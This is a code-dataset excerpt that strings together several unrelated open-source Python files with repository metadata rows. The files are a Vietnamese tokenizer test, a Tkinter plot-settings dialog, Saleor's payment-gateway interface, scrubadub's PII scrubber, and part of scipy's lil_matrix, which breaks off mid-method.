        self.assertEqual(uv.convert2Unsign(u'Thử xem ổn không nhé: Lưu Vĩnh Toàn, Phạm Kim Cương'), u'Thu xem on khong nhe: Luu Vinh Toan, Pham Kim Cuong')

    def testTokenized(self):
        # '+', ',', ';', '.', '-' split tokens; '_' does not.
        s = u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong A-B. A_B'
        expect = [u'Lưu', u'Vĩnh', u'Toàn', u'Pham', u'Kim', u'Cuong', u'A', u'B', 'A_B']
        self.assertEqual(uv.tokenized(s), expect)

    def testMakePhraseToken(self):
        # Phrase tokens are lower-cased and '_'-joined with a leading '_'.
        self.assertEqual(uv.makePhraseToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), u'_lưu_vĩnh_toàn_pham_kim_cuong')
        self.assertEqual(uv.makePhraseToken(u'Toàn'), u'_toàn')
        self.assertEqual(uv.makePhraseToken(u';'), u'__')
        self.assertEqual(uv.makePhraseToken(u''), u'_')

    def testMakeSuffixNGramToken(self):
        # Every suffix of the phrase appears both accented and unaccented
        # (the single-word suffix '_cuong' has no accents to strip).
        expect = set()
        expect.add(u'_lưu_vĩnh_toàn_pham_kim_cuong')
        expect.add(u'_luu_vinh_toan_pham_kim_cuong')
        expect.add(u'_vĩnh_toàn_pham_kim_cuong')
        expect.add(u'_vinh_toan_pham_kim_cuong')
        expect.add(u'_toàn_pham_kim_cuong')
        expect.add(u'_toan_pham_kim_cuong')
        expect.add(u'_pham_kim_cuong')
        expect.add(u'_kim_cuong')
        expect.add(u'_cuong')
        self.assertEqual(uv.makeSuffixNGramToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), expect)

    def testMakeNGramToken(self):
        # All contiguous n-grams up to length 4, accents preserved.
        expect = set()
        expect.add(u'_lưu_vĩnh_toàn_pham')
        expect.add(u'_vĩnh_toàn_pham_kim')
        expect.add(u'_toàn_pham_kim_cuong')
        expect.add(u'_lưu_vĩnh_toàn')
        expect.add(u'_vĩnh_toàn_pham')
        expect.add(u'_toàn_pham_kim')
        expect.add(u'_pham_kim_cuong')
        expect.add(u'_lưu_vĩnh')
        expect.add(u'_vĩnh_toàn')
        expect.add(u'_toàn_pham')
        expect.add(u'_pham_kim')
        expect.add(u'_kim_cuong')
        expect.add(u'_lưu')
        expect.add(u'_vĩnh')
        expect.add(u'_toàn')
        expect.add(u'_pham')
        expect.add(u'_kim')
        expect.add(u'_cuong')
        self.assertEqual(uv.makeNGramToken(u'Lưu Vĩnh+Toàn, Pham; Kim.Cuong'), expect)

    def testSimpleTokenized(self):
        # Whitespace, '-' and ',' all act as separators.
        self.assertEqual(uv.simpleTokenized(u'hello \tw'), ['hello', 'w'])
        self.assertEqual(uv.simpleTokenized(u't-mobile'), ['t','mobile'])
        self.assertEqual(uv.simpleTokenized(u'o to, xe may'), ['o', 'to','xe', 'may'])
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
abffbf28fffc2cff9a3165f8a00e57f2989d81b9 | 3b219f97d6ad54b8d061c3d7776dad064777ba0a | /matplotlayers/backends/tk/stack_settings.py | 0a2bb5ae0664a6f831bae21c7905a590ab68b033 | [
"MIT"
] | permissive | friedrichromstedt/matplotlayers | f03e94d99d6550e1657023889ad4defe7f1eb64f | a0c883476ac5b0f457e32e8831d87f7a0ca0bb80 | refs/heads/master | 2021-01-10T21:31:36.012401 | 2011-05-24T14:38:36 | 2011-05-24T14:38:36 | 1,793,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,303 | py | # Copyright (c) 2010 Friedrich Romstedt <[email protected]>
# See also <www.friedrichromstedt.org> (if e-mail has changed)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Developed since: Aug 2008
"""Defines the settings dialog class for accessing the details of a Stack."""
import Tkinter
import tkFileDialog
import ventry
class StackSettings(Tkinter.Toplevel):
    def __init__(self, master,
            stack,
            callback_update):
        """Build the settings dialog for a plot stack.

        *stack* is the matplotlayers.Stack to act upon; *callback_update* is
        called (without arguments) whenever the stack must be redrawn.
        """
        Tkinter.Toplevel.__init__(self, master)

        self.stack = stack
        self.callback_update = callback_update

        # Create Settings widgets ...
        self.lframe_settings = Tkinter.LabelFrame(self, text = 'Settings')
        self.lframe_settings.pack(side = Tkinter.LEFT, anchor = Tkinter.N)

        # Create labeling widgets.
        self.lframe_labeling = Tkinter.LabelFrame(self.lframe_settings,
                text = 'Labeling')
        self.lframe_labeling.pack(side = Tkinter.TOP, anchor = Tkinter.W)
        self.frame_labeling = Tkinter.Frame(self.lframe_labeling)
        self.frame_labeling.pack(side = Tkinter.TOP)

        # Newlines in the current labels are shown as the literal two-character
        # sequence "\n" so they can be edited in a single-line entry widget.
        if self.stack.title is None:
            initial_title = ''
        else:
            initial_title = self.stack.title.replace('\n',r'\n')
        if self.stack.xlabel is None:
            initial_xlabel = ''
        else:
            initial_xlabel = self.stack.xlabel.replace('\n',r'\n')
        if self.stack.ylabel is None:
            initial_ylabel = ''
        else:
            initial_ylabel = self.stack.ylabel.replace('\n',r'\n')

        self.title = ventry.NamedVEntry(self.frame_labeling,
                name = 'Title:',
                column = 0, row = 0,
                initial = initial_title,
                width = 40)
        self.xlabel = ventry.NamedVEntry(self.frame_labeling,
                name = 'x label:',
                column = 0, row = 1,
                initial = initial_xlabel,
                width = 40)
        self.ylabel = ventry.NamedVEntry(self.frame_labeling,
                name = 'y label:',
                column = 0, row = 2,
                initial = initial_ylabel,
                width = 40)
        self.title.initialise()
        self.xlabel.initialise()
        self.ylabel.initialise()
        self.update_title()

        self.button_update_labeling = Tkinter.Button(self.lframe_labeling,
                text = 'Update Labeling',
                command = self.tk_update_labeling)
        self.button_update_labeling.pack(side = Tkinter.TOP,
                fill = Tkinter.X)

        # Create limit widgets.
        self.lframe_limits = Tkinter.LabelFrame(self.lframe_settings,
                text = 'Limits')
        self.lframe_limits.pack(side = Tkinter.TOP, anchor = Tkinter.W)
        self.frame_limits = Tkinter.Frame(self.lframe_limits)
        self.frame_limits.pack(side = Tkinter.TOP)

        # Pre-fill the limit entries with the stack's current axis limits.
        (xlim0, xlim1) = self.stack.get_xlim()
        (ylim0, ylim1) = self.stack.get_ylim()
        self.xlim_left = ventry.NamedVEntry(self.frame_limits,
                name = 'x Limits:',
                column = 0, row = 0,
                initial = xlim0,
                validate = ventry.number)
        self.xlim_right = ventry.VEntry(self.frame_limits,
                initial = xlim1,
                validate = ventry.number)
        self.xlim_right.grid(column = 2, row = 0)
        self.xlim_left.initialise()
        self.xlim_right.initialise()

        self.ylim_bottom = ventry.NamedVEntry(self.frame_limits,
                name = 'y Limits:',
                column = 0, row = 1,
                initial = ylim0,
                validate = ventry.number)
        self.ylim_top = ventry.VEntry(self.frame_limits,
                initial = ylim1,
                validate = ventry.number)
        self.ylim_top.grid(column = 2, row = 1)
        self.ylim_bottom.initialise()
        self.ylim_top.initialise()

        # Mirror the stack's autoscale flags in Tk variables driving the
        # checkbuttons below.
        self.autoscalex_on = Tkinter.BooleanVar(self.lframe_limits)
        self.autoscaley_on = Tkinter.BooleanVar(self.lframe_limits)
        self.autoscalex_on.set(self.stack.get_autoscalex_on())
        self.autoscaley_on.set(self.stack.get_autoscaley_on())
        self.checkbutton_autoscalex_on = Tkinter.Checkbutton(
                self.lframe_limits,
                text = 'x Autoscale',
                command = self.tk_autoscalex_on,
                variable = self.autoscalex_on)
        self.checkbutton_autoscalex_on.pack(side = Tkinter.TOP)
        self.checkbutton_autoscaley_on = Tkinter.Checkbutton(
                self.lframe_limits,
                text = 'y Autoscale',
                command = self.tk_autoscaley_on,
                variable = self.autoscaley_on)
        self.checkbutton_autoscaley_on.pack(side = Tkinter.TOP)

        self.button_update_limits = Tkinter.Button(self.lframe_limits,
                text = 'Update Scales',
                command = self.tk_update_limits)
        self.button_update_limits.pack(side = Tkinter.TOP,
                fill = Tkinter.X)

        # Grey out the manual limit entries if autoscaling is initially on.
        self.update_autoscalex_accessibility()
        self.update_autoscaley_accessibility()
def tk_update_labeling(self):
    """Push the title and axis-label entries into the stack, redraw,
    and refresh the window title."""
    # The entry widgets hold a literal backslash-n; convert it to a real
    # newline before handing the text to the stack.
    for entry, setter in ((self.title, self.stack.set_title),
                          (self.xlabel, self.stack.set_xlabel),
                          (self.ylabel, self.stack.set_ylabel)):
        setter(entry.get().replace('\\n', '\n'))
    self.callback_update()
    self.update_title()
def tk_update_limits(self):
    """Synchronise axis limits between the entry widgets and the stack.

    For an axis in autoscale mode the entries are refreshed from the
    stack; for an axis in explicit mode the typed-in values are written
    to the stack and a redraw is requested.
    """
    # Tells whether an update is needed or not:
    update_needed = False
    if self.autoscalex_on.get():
        # We are in autoscale mode, thus update the values displayed ...
        (xlim0, xlim1) = self.stack.get_xlim()
        self.xlim_left.set(xlim0)
        self.xlim_right.set(xlim1)
    else:
        # We are in explicit mode, thus write the values typed in to
        # the stack ...
        self.stack.set_xlim(
            (self.xlim_left.get(), self.xlim_right.get()))
        # Only in this branch update the stack.
        update_needed = True
    if self.autoscaley_on.get():
        # We are in autoscale mode, thus update the values displayed ...
        (ylim0, ylim1) = self.stack.get_ylim()
        self.ylim_bottom.set(ylim0)
        self.ylim_top.set(ylim1)
    else:
        # We are in explicit mode thus write the values typed in to
        # the stack ...
        self.stack.set_ylim(
            (self.ylim_bottom.get(), self.ylim_top.get()))
        # Only in this branch update the stack.
        update_needed = True
    if update_needed:
        self.callback_update()
def update_autoscalex_accessibility(self):
    """Enables / Disables widgets according to the X autoscale setting."""
    entries = (self.xlim_left, self.xlim_right)
    if self.autoscalex_on.get():
        # Autoscaling: the explicit-limit entries are meaningless.
        for entry in entries:
            entry.disable()
    else:
        # Explicit limits: let the user type values in.
        for entry in entries:
            entry.enable()
def update_autoscaley_accessibility(self):
    """Enables / Disables widgets according to the Y autoscale setting."""
    entries = (self.ylim_bottom, self.ylim_top)
    if self.autoscaley_on.get():
        # Autoscaling: the explicit-limit entries are meaningless.
        for entry in entries:
            entry.disable()
    else:
        # Explicit limits: let the user type values in.
        for entry in entries:
            entry.enable()
def tk_autoscalex_on(self):
    """Called on changes of the autoscale X checkbutton."""
    # Propagate the checkbutton state to the stack ...
    self.stack.set_autoscale_on(
        x_on=True if self.autoscalex_on.get() else False)
    # Enable / disable the limit entries ...
    self.update_autoscalex_accessibility()
    # If the autoscaling has been disabled, update the displayed limits,
    # because they may have changed due to autoscaling under the way ...
    (lo, hi) = self.stack.get_xlim()
    self.xlim_left.set(lo)
    self.xlim_right.set(hi)
    self.callback_update()
def tk_autoscaley_on(self):
    """Called on changes of the autoscale Y checkbutton."""
    # Propagate the checkbutton state to the stack ...
    self.stack.set_autoscale_on(
        y_on=True if self.autoscaley_on.get() else False)
    # Enable / disable the limit entries ...
    self.update_autoscaley_accessibility()
    # If the autoscaling has been disabled, update the displayed limits,
    # because they may have changed due to autoscaling under the way ...
    (lo, hi) = self.stack.get_ylim()
    self.ylim_bottom.set(lo)
    self.ylim_top.set(hi)
    self.callback_update()
def update_title(self):
    """Update the title of the window according to the title of the
    stack."""
    # Chosen so the title is meaningful whether or not a stack title
    # has been set.
    self.wm_title('Stack Settings %s' % self.title.get())
| [
"[email protected]"
] | |
47114303d4036a4aeb4733f34ef927d7095bb970 | ac2c3e8c278d0aac250d31fd023c645fa3984a1b | /saleor/saleor/core/payments.py | 777cdcf229f3af0436638628319a4ed5f6c33a12 | [
"CC-BY-4.0",
"BSD-3-Clause"
] | permissive | jonndoe/saleor-test-shop | 152bc8bef615382a45ca5f4f86f3527398bd1ef9 | 1e83176684f418a96260c276f6a0d72adf7dcbe6 | refs/heads/master | 2023-01-21T16:54:36.372313 | 2020-12-02T10:19:13 | 2020-12-02T10:19:13 | 316,514,489 | 1 | 1 | BSD-3-Clause | 2020-11-27T23:29:20 | 2020-11-27T13:52:33 | TypeScript | UTF-8 | Python | false | false | 1,983 | py | from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, List, Optional
if TYPE_CHECKING:
# flake8: noqa
from ..checkout.models import Checkout, CheckoutLine
from ..discount import DiscountInfo
from ..payment.interface import (
PaymentData,
GatewayResponse,
TokenConfig,
CustomerSource,
PaymentGateway,
)
class PaymentInterface(ABC):
    """Abstract interface for the payment-gateway plugin layer.

    Each operation is dispatched to the gateway identified by the
    ``gateway`` string and returns that gateway's response object.
    """

    @abstractmethod
    def list_payment_gateways(
        self, currency: Optional[str] = None, active_only: bool = True
    ) -> List["PaymentGateway"]:
        """Return configured gateways, optionally filtered by currency
        and by active status."""
        pass

    @abstractmethod
    def checkout_available_payment_gateways(
        self, checkout: "Checkout",
    ) -> List["PaymentGateway"]:
        """Return the gateways usable for *checkout* (selection criteria
        are implementation-defined)."""
        pass

    @abstractmethod
    def authorize_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Authorize (reserve) the payment on the given gateway."""
        pass

    @abstractmethod
    def capture_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Capture a previously authorized payment."""
        pass

    @abstractmethod
    def refund_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Refund a captured payment."""
        pass

    @abstractmethod
    def void_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Void (cancel) an authorized, not-yet-captured payment."""
        pass

    @abstractmethod
    def confirm_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Confirm a payment that required additional customer action."""
        pass

    @abstractmethod
    def token_is_required_as_payment_input(self, gateway) -> bool:
        """Tell whether the gateway needs a client-side token as input."""
        pass

    @abstractmethod
    def process_payment(
        self, gateway: str, payment_information: "PaymentData"
    ) -> "GatewayResponse":
        """Run the gateway's default end-to-end payment flow."""
        pass

    @abstractmethod
    def get_client_token(self, gateway: str, token_config: "TokenConfig") -> str:
        """Return a client token used to initialise the gateway's
        client-side SDK."""
        pass

    @abstractmethod
    def list_payment_sources(
        self, gateway: str, customer_id: str
    ) -> List["CustomerSource"]:
        """Return stored payment sources for the given customer."""
        pass
| [
"[email protected]"
] | |
09e35450b6520f6def9cc7c4b3196fd617f912dc | f7b3c098db4dcea347eac5ee18fc19b84cbf2059 | /scrubadub/scrubbers.py | fa06a388bb3e10f0b9bdd5a8bc93ad220ffe8f15 | [
"MIT"
] | permissive | jb08/scrubadub | f625a4bc265dfb743ab91f0a1449629392233cb2 | 7e7b6acc3938ded1e596960b6f095b7e79ae503e | refs/heads/master | 2021-01-16T22:03:02.271663 | 2016-01-14T20:25:32 | 2016-01-14T20:25:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,748 | py | import re
import operator
import textblob
import nltk
from . import exceptions
from . import detectors
from .filth import Filth, MergedFilth
class Scrubber(object):
    """The Scrubber class is used to clean personal information out of dirty
    dirty text. It manages a set of ``Detector``'s that are each responsible
    for identifying their particular kind of ``Filth``.
    """

    def __init__(self, *args, **kwargs):
        super(Scrubber, self).__init__(*args, **kwargs)

        # Instantiate one detector per registered filth type.  (The loop
        # variable is named ``filth_type`` so it does not shadow the
        # ``type`` builtin.)
        self.detectors = {}
        for filth_type, detector_cls in detectors.types.iteritems():
            self.detectors[filth_type] = detector_cls()

    def clean(self, text, **kwargs):
        """This is the master method that cleans all of the filth out of the
        dirty dirty ``text``. All keyword arguments to this function are passed
        through to the ``Filth.replace_with`` method to fine-tune how the
        ``Filth`` is cleaned.
        """
        if not isinstance(text, unicode):
            raise exceptions.UnicodeRequired

        clean_chunks = []
        filth = Filth()
        for next_filth in self.iter_filth(text):
            # Copy the clean text between the previous filth and this one,
            # then the sanitised replacement for the filth itself.
            clean_chunks.append(text[filth.end:next_filth.beg])
            clean_chunks.append(next_filth.replace_with(**kwargs))
            filth = next_filth
        clean_chunks.append(text[filth.end:])
        return u''.join(clean_chunks)

    def iter_filth(self, text):
        """Iterate over the different types of filth that can exist.
        """
        # currently doing this by aggregating all_filths and then sorting
        # inline instead of with a Filth.__cmp__ method, which is apparently
        # much slower http://stackoverflow.com/a/988728/564709
        #
        # NOTE: we could probably do this in a more efficient way by iterating
        # over all detectors simultaneously. just trying to get something
        # working right now and we can worry about efficiency later
        all_filths = []
        for detector in self.detectors.itervalues():
            for filth in detector.iter_filth(text):
                if not isinstance(filth, Filth):
                    raise TypeError('iter_filth must always yield Filth')
                all_filths.append(filth)
        all_filths.sort(key=operator.attrgetter("beg"))

        # this is where the Scrubber does its hard work and merges any
        # overlapping filths.
        if not all_filths:
            # BUGFIX: this used to ``raise StopIteration``, which PEP 479
            # turns into a RuntimeError inside generators (Python 3.7+).
            # A bare ``return`` ends the generator cleanly on every
            # Python version.
            return
        filth = all_filths[0]
        for next_filth in all_filths[1:]:
            if filth.end < next_filth.beg:
                yield filth
                filth = next_filth
            else:
                filth = filth.merge(next_filth)
        yield filth
| [
"[email protected]"
] | |
a50ab7354bd04c8263af34a4f7c90352a755304e | d094ba0c8a9b1217fbf014aa79a283a49aabe88c | /env/lib/python3.6/site-packages/scipy/sparse/lil.py | c70f816d9a9118c4cec72b2b2917dca5086450f2 | [
"MIT",
"BSD-3-Clause-Open-MPI",
"BSD-3-Clause",
"GPL-3.0-or-later",
"Apache-2.0",
"Qhull",
"BSD-2-Clause",
"GCC-exception-3.1",
"Python-2.0",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Raniac/NEURO-LEARN | d9274e0baadd97bb02da54bdfcf6ca091fc1c703 | 3c3acc55de8ba741e673063378e6cbaf10b64c7a | refs/heads/master | 2022-12-25T23:46:54.922237 | 2020-09-06T03:15:14 | 2020-09-06T03:15:14 | 182,013,100 | 9 | 2 | Apache-2.0 | 2022-12-09T21:01:00 | 2019-04-18T03:57:00 | CSS | UTF-8 | Python | false | false | 17,782 | py | """LInked List sparse matrix class
"""
from __future__ import division, print_function, absolute_import
__docformat__ = "restructuredtext en"
__all__ = ['lil_matrix','isspmatrix_lil']
from bisect import bisect_left
import numpy as np
from scipy._lib.six import xrange, zip
from .base import spmatrix, isspmatrix
from .sputils import (getdtype, isshape, isscalarlike, IndexMixin,
upcast_scalar, get_index_dtype, isintlike, check_shape,
check_reshape_kwargs)
from . import _csparsetools
class lil_matrix(spmatrix, IndexMixin):
    """Row-based linked list sparse matrix

    This is a structure for constructing sparse matrices incrementally.
    Note that inserting a single item can take linear time in the worst case;
    to construct a matrix efficiently, make sure the items are pre-sorted by
    index, per row.

    This can be instantiated in several ways:
        lil_matrix(D)
            with a dense matrix or rank-2 ndarray D

        lil_matrix(S)
            with another sparse matrix S (equivalent to S.tolil())

        lil_matrix((M, N), [dtype])
            to construct an empty matrix with shape (M, N)
            dtype is optional, defaulting to dtype='d'.

    Attributes
    ----------
    dtype : dtype
        Data type of the matrix
    shape : 2-tuple
        Shape of the matrix
    ndim : int
        Number of dimensions (this is always 2)
    nnz
        Number of nonzero elements
    data
        LIL format data array of the matrix
    rows
        LIL format row index array of the matrix

    Notes
    -----
    Sparse matrices can be used in arithmetic operations: they support
    addition, subtraction, multiplication, division, and matrix power.

    Advantages of the LIL format
        - supports flexible slicing
        - changes to the matrix sparsity structure are efficient

    Disadvantages of the LIL format
        - arithmetic operations LIL + LIL are slow (consider CSR or CSC)
        - slow column slicing (consider CSC)
        - slow matrix vector products (consider CSR or CSC)

    Intended Usage
        - LIL is a convenient format for constructing sparse matrices
        - once a matrix has been constructed, convert to CSR or
          CSC format for fast arithmetic and matrix vector operations
        - consider using the COO format when constructing large matrices

    Data Structure
        - An array (``self.rows``) of rows, each of which is a sorted
          list of column indices of non-zero elements.
        - The corresponding nonzero values are stored in similar
          fashion in ``self.data``.

    """
    format = 'lil'

    def __init__(self, arg1, shape=None, dtype=None, copy=False):
        spmatrix.__init__(self)
        self.dtype = getdtype(dtype, arg1, default=float)

        # First get the shape
        if isspmatrix(arg1):
            # Construct from another sparse matrix.
            if isspmatrix_lil(arg1) and copy:
                A = arg1.copy()
            else:
                A = arg1.tolil()

            if dtype is not None:
                A = A.astype(dtype)

            self._shape = check_shape(A.shape)
            self.dtype = A.dtype
            self.rows = A.rows
            self.data = A.data
        elif isinstance(arg1,tuple):
            # Construct an empty (M, N) matrix: one empty index list and
            # one empty value list per row.
            if isshape(arg1):
                if shape is not None:
                    raise ValueError('invalid use of shape parameter')
                M, N = arg1
                self._shape = check_shape((M, N))
                self.rows = np.empty((M,), dtype=object)
                self.data = np.empty((M,), dtype=object)
                for i in range(M):
                    self.rows[i] = []
                    self.data[i] = []
            else:
                raise TypeError('unrecognized lil_matrix constructor usage')
        else:
            # assume A is dense
            try:
                A = np.asmatrix(arg1)
            except TypeError:
                raise TypeError('unsupported matrix type')
            else:
                # Round-trip through CSR, which knows how to ingest dense
                # input efficiently.
                from .csr import csr_matrix
                A = csr_matrix(A, dtype=dtype).tolil()

                self._shape = check_shape(A.shape)
                self.dtype = A.dtype
                self.rows = A.rows
                self.data = A.data

    def __iadd__(self,other):
        self[:,:] = self + other
        return self

    def __isub__(self,other):
        self[:,:] = self - other
        return self

    def __imul__(self,other):
        if isscalarlike(other):
            self[:,:] = self * other
            return self
        else:
            return NotImplemented

    def __itruediv__(self,other):
        if isscalarlike(other):
            self[:,:] = self / other
            return self
        else:
            return NotImplemented

    # Whenever the dimensions change, empty lists should be created for each
    # row

    def getnnz(self, axis=None):
        if axis is None:
            return sum([len(rowvals) for rowvals in self.data])
        if axis < 0:
            axis += 2
        if axis == 0:
            # Per-column count: tally every stored column index.
            out = np.zeros(self.shape[1], dtype=np.intp)
            for row in self.rows:
                out[row] += 1
            return out
        elif axis == 1:
            # Per-row count: simply the length of each row's index list.
            return np.array([len(rowvals) for rowvals in self.data], dtype=np.intp)
        else:
            raise ValueError('axis out of bounds')

    def count_nonzero(self):
        return sum(np.count_nonzero(rowvals) for rowvals in self.data)

    getnnz.__doc__ = spmatrix.getnnz.__doc__
    count_nonzero.__doc__ = spmatrix.count_nonzero.__doc__

    def __str__(self):
        # One "  (i, j)\tvalue" line per stored entry; trailing newline
        # stripped by the final slice.
        val = ''
        for i, row in enumerate(self.rows):
            for pos, j in enumerate(row):
                val += "  %s\t%s\n" % (str((i, j)), str(self.data[i][pos]))
        return val[:-1]

    def getrowview(self, i):
        """Returns a view of the 'i'th row (without copying).
        """
        new = lil_matrix((1, self.shape[1]), dtype=self.dtype)
        new.rows[0] = self.rows[i]
        new.data[0] = self.data[i]
        return new

    def getrow(self, i):
        """Returns a copy of the 'i'th row.
        """
        i = self._check_row_bounds(i)
        new = lil_matrix((1, self.shape[1]), dtype=self.dtype)
        new.rows[0] = self.rows[i][:]
        new.data[0] = self.data[i][:]
        return new

    def _check_row_bounds(self, i):
        # Normalise a (possibly negative) row index and bounds-check it.
        if i < 0:
            i += self.shape[0]
        if i < 0 or i >= self.shape[0]:
            raise IndexError('row index out of bounds')
        return i

    def _check_col_bounds(self, j):
        # Normalise a (possibly negative) column index and bounds-check it.
        if j < 0:
            j += self.shape[1]
        if j < 0 or j >= self.shape[1]:
            raise IndexError('column index out of bounds')
        return j

    def __getitem__(self, index):
        """Return the element(s) index=(i, j), where j may be a slice.
        This always returns a copy for consistency, since slices into
        Python lists return copies.
        """

        # Scalar fast path first
        if isinstance(index, tuple) and len(index) == 2:
            i, j = index
            # Use isinstance checks for common index types; this is
            # ~25-50% faster than isscalarlike. Other types are
            # handled below.
            if ((isinstance(i, int) or isinstance(i, np.integer)) and
                    (isinstance(j, int) or isinstance(j, np.integer))):
                v = _csparsetools.lil_get1(self.shape[0], self.shape[1],
                                           self.rows, self.data,
                                           i, j)
                return self.dtype.type(v)

        # Utilities found in IndexMixin
        i, j = self._unpack_index(index)

        # Proper check for other scalar index types
        i_intlike = isintlike(i)
        j_intlike = isintlike(j)

        if i_intlike and j_intlike:
            v = _csparsetools.lil_get1(self.shape[0], self.shape[1],
                                       self.rows, self.data,
                                       i, j)
            return self.dtype.type(v)
        elif j_intlike or isinstance(j, slice):
            # column slicing fast path
            if j_intlike:
                j = self._check_col_bounds(j)
                j = slice(j, j+1)

            if i_intlike:
                i = self._check_row_bounds(i)
                i = xrange(i, i+1)
                i_shape = None
            elif isinstance(i, slice):
                i = xrange(*i.indices(self.shape[0]))
                i_shape = None
            else:
                i = np.atleast_1d(i)
                i_shape = i.shape

            if i_shape is None or len(i_shape) == 1:
                return self._get_row_ranges(i, j)

        # General (fancy) indexing path.
        i, j = self._index_to_arrays(i, j)
        if i.size == 0:
            return lil_matrix(i.shape, dtype=self.dtype)

        new = lil_matrix(i.shape, dtype=self.dtype)

        i, j = _prepare_index_for_memoryview(i, j)
        _csparsetools.lil_fancy_get(self.shape[0], self.shape[1],
                                    self.rows, self.data,
                                    new.rows, new.data,
                                    i, j)
        return new

    def _get_row_ranges(self, rows, col_slice):
        """
        Fast path for indexing in the case where column index is slice.

        This gains performance improvement over brute force by more
        efficient skipping of zeros, by accessing the elements
        column-wise in order.

        Parameters
        ----------
        rows : sequence or xrange
            Rows indexed. If xrange, must be within valid bounds.
        col_slice : slice
            Columns indexed

        """
        j_start, j_stop, j_stride = col_slice.indices(self.shape[1])
        col_range = xrange(j_start, j_stop, j_stride)
        nj = len(col_range)
        new = lil_matrix((len(rows), nj), dtype=self.dtype)

        _csparsetools.lil_get_row_ranges(self.shape[0], self.shape[1],
                                         self.rows, self.data,
                                         new.rows, new.data,
                                         rows,
                                         j_start, j_stop, j_stride, nj)

        return new

    def __setitem__(self, index, x):
        """Assign x to the element(s) at *index* (scalar, slice or fancy)."""
        # Scalar fast path first
        if isinstance(index, tuple) and len(index) == 2:
            i, j = index
            # Use isinstance checks for common index types; this is
            # ~25-50% faster than isscalarlike. Scalar index
            # assignment for other types is handled below together
            # with fancy indexing.
            if ((isinstance(i, int) or isinstance(i, np.integer)) and
                    (isinstance(j, int) or isinstance(j, np.integer))):
                x = self.dtype.type(x)
                if x.size > 1:
                    # Triggered if input was an ndarray
                    raise ValueError("Trying to assign a sequence to an item")
                _csparsetools.lil_insert(self.shape[0], self.shape[1],
                                         self.rows, self.data, i, j, x)
                return

        # General indexing
        i, j = self._unpack_index(index)

        # shortcut for common case of full matrix assign:
        if (isspmatrix(x) and isinstance(i, slice) and i == slice(None) and
                isinstance(j, slice) and j == slice(None)
                and x.shape == self.shape):
            x = lil_matrix(x, dtype=self.dtype)
            self.rows = x.rows
            self.data = x.data
            return

        i, j = self._index_to_arrays(i, j)

        if isspmatrix(x):
            x = x.toarray()

        # Make x and i into the same shape
        x = np.asarray(x, dtype=self.dtype)
        x, _ = np.broadcast_arrays(x, i)

        if x.shape != i.shape:
            raise ValueError("shape mismatch in assignment")

        # Set values
        i, j, x = _prepare_index_for_memoryview(i, j, x)
        _csparsetools.lil_fancy_set(self.shape[0], self.shape[1],
                                    self.rows, self.data,
                                    i, j, x)

    def _mul_scalar(self, other):
        if other == 0:
            # Multiply by zero: return the zero matrix
            new = lil_matrix(self.shape, dtype=self.dtype)
        else:
            res_dtype = upcast_scalar(self.dtype, other)

            new = self.copy()
            new = new.astype(res_dtype)
            # Multiply this scalar by every element.
            for j, rowvals in enumerate(new.data):
                new.data[j] = [val*other for val in rowvals]
        return new

    def __truediv__(self, other):           # self / other
        if isscalarlike(other):
            new = self.copy()
            # Divide every element by this scalar
            for j, rowvals in enumerate(new.data):
                new.data[j] = [val/other for val in rowvals]
            return new
        else:
            # Element-wise / matrix division: delegate to CSR.
            return self.tocsr() / other

    def copy(self):
        from copy import deepcopy

        new = lil_matrix(self.shape, dtype=self.dtype)
        # deepcopy so the per-row lists are not shared with self.
        new.data = deepcopy(self.data)
        new.rows = deepcopy(self.rows)
        return new

    copy.__doc__ = spmatrix.copy.__doc__

    def reshape(self, *args, **kwargs):
        shape = check_shape(args, self.shape)
        order, copy = check_reshape_kwargs(kwargs)

        # Return early if reshape is not required
        if shape == self.shape:
            if copy:
                return self.copy()
            else:
                return self

        new = lil_matrix(shape, dtype=self.dtype)

        if order == 'C':
            # Map each stored entry's flat (row-major) position into the
            # new shape.
            ncols = self.shape[1]
            for i, row in enumerate(self.rows):
                for col, j in enumerate(row):
                    new_r, new_c = np.unravel_index(i * ncols + j, shape)
                    new[new_r, new_c] = self[i, j]
        elif order == 'F':
            # Same, but with column-major (Fortran) flat ordering.
            nrows = self.shape[0]
            for i, row in enumerate(self.rows):
                for col, j in enumerate(row):
                    new_r, new_c = np.unravel_index(i + j * nrows, shape, order)
                    new[new_r, new_c] = self[i, j]
        else:
            raise ValueError("'order' must be 'C' or 'F'")

        return new

    reshape.__doc__ = spmatrix.reshape.__doc__

    def resize(self, *shape):
        shape = check_shape(shape)
        new_M, new_N = shape
        M, N = self.shape
        if new_M < M:
            # Shrinking: drop whole rows beyond the new row count.
            self.rows = self.rows[:new_M]
